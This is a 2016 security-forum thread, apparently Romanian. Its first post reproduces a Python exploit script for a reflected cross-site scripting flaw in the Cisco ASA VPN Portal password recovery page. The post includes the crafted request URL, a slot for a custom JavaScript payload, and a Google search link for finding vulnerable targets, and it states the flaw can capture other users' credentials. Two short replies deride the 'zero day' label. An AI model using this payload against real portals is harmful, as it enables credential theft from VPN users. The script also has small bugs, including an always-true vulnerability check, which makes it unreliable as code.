Guest Zxald Posted February 18, 2016 Report Share Posted February 18, 2016 (edited) The Cisco ASA VPN Portal password recovery page suffers from a cross site scripting vulnerability. # Exploit author: Juan Sacco - jsacco@exploitpack.com # Affected program: Cisco ASA VPN Portal - Zero Day # Cisco ASA VPN is prone to a XSS on the password recovery page. # This vulnerability can be used by an attacker to capture other user's credentials. # The password recovery form fails to filter properly the hidden inputs fields. # # This Zero Day exploit has been developed and discovered by Juan Sacco. # Exploit Pack - Team http://exploitpack.com # # Release Dates: # Reported to Cisco PSIRT Feb 4/2016 # Cisco Dev Team working on a fix Feb 15/2016 # Cisco PSIRT report a CVE Feb 15/2016 # Exploit Pack disclose the bug Feb 15/2016 # Disclosure of the Exploit Feb 16/2016 # # Look for vulnerable targets here:https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F # More than 18.000 results in Google only import string, sys import socket, httplib import telnetlib def run(): try: Target = sys.argv[1] Port = int(sys.argv[2]) # Here goes your custom JS agent code Payload = "alert(1)" VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_" CraftedRequest = VulnerableURL # Start the connection connection = httplib.HTTPSConnection(Target) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data = Response.read() vulnerable = "Target is not vulnerable" for line in str(data).splitlines(): if "juansacco\\\"" in line: vulnerable = "Targer is vulnerable" if vulnerable != "Not vulnerable": print "Result of the test:", vulnerable # Find the injection on the response connection.close() except Exception,e: print "Exploit connection closed " + str(e) if __name__ == '__main__': print "Cisco VPN ASA Exploit - Zero Day" print "################################" print "Author: Juan Sacco - jsacco@exploitpack.com" try: Target = sys.argv[1] Port = sys.argv[2] except IndexError: pass run() Source Edited February 18, 2016 by Zxald Quote Link to comment Share on other sites More sharing options...
Nytro Posted February 18, 2016 Report Share Posted February 18, 2016 Ce? S-a postat peste tot ca fiind un ditamai 0day-ul si e un cacat de XSS? Quote Link to comment Share on other sites More sharing options...
sleed Posted February 19, 2016 Report Share Posted February 19, 2016 Mai nou XSS-urile, sunt denumite ca fiind 0day uri Quote Link to comment Share on other sites More sharing options...